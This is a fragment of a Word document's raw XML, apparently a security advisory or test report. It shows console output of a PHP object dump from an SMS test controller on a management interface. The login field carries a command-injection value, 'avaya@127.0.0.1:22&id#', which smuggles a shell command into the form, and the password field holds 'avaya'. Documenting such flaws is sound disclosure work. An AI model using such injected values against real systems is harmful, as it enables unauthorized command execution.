            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="629D4274" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">        )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="460B4557" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_labelSuffix</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="396FF558" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17240989" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_sms_record</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C8E9B11" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65DFD442" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56DED632" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_config</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DCC1D6C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_login</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A91893B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C4A83D6" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       'slog' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71B075B1" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_pageError</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="199FF60C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_formAction</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'submit',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28AEEFD2" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_defaultAction</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sms_test</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A330D60" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_formId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sms_test</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7394FDA7" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_title</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Test System Management Service',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35D3F172" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_helpContext</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EE26CF8" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F7B35AA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'type' =&gt; '-&gt;',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64C6B736" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="366F8795" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FB1275B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      0 =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>submitRequest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A3FD227" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D6E2B5C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="068258BE" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  1 =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51932F4A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="168A018D"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SAWController.class.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="476A45A1" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'line' =&gt; 336,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52FE0F4C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'function' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>on_submit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="779DC055" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'class' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SMSTestController</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79E86207" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'object' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6305AF23" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>SMSTestController</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>__</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>set_state</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(array(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C1CB0A6" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_sms</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23B1AF77" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>SMSTestModel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>__</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>set_state</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(array(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72A53614" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="471892E7" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14C888A7" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          'Login' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C2F3540"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A1AB622" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Login',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DCA271F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F4B91E5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="412902E4" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 15,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D60B2AD" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'CM Login ID',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61B38C7C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="402151A1" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'avaya@127.0.0.1:22&amp;id#',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59456C7F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57602A43" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F423C49" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          'Password' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B0F7E3B"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C6A82BD" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Password',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D265651" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12CA2A1C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70BE2EFD" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 15,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B1D904D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Password',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4835C57F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51E665B6" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>avaya</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ED8E963" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="327E2E84" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DCB5698" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          'Model' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CC5DA7C"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D5BBC02" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Model',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43488765" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="507F1278" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35F46B33" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 30,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CC142B0" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Model',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D285EDD" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30CC00C1" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>AARAnalysis</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D45B5FF" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
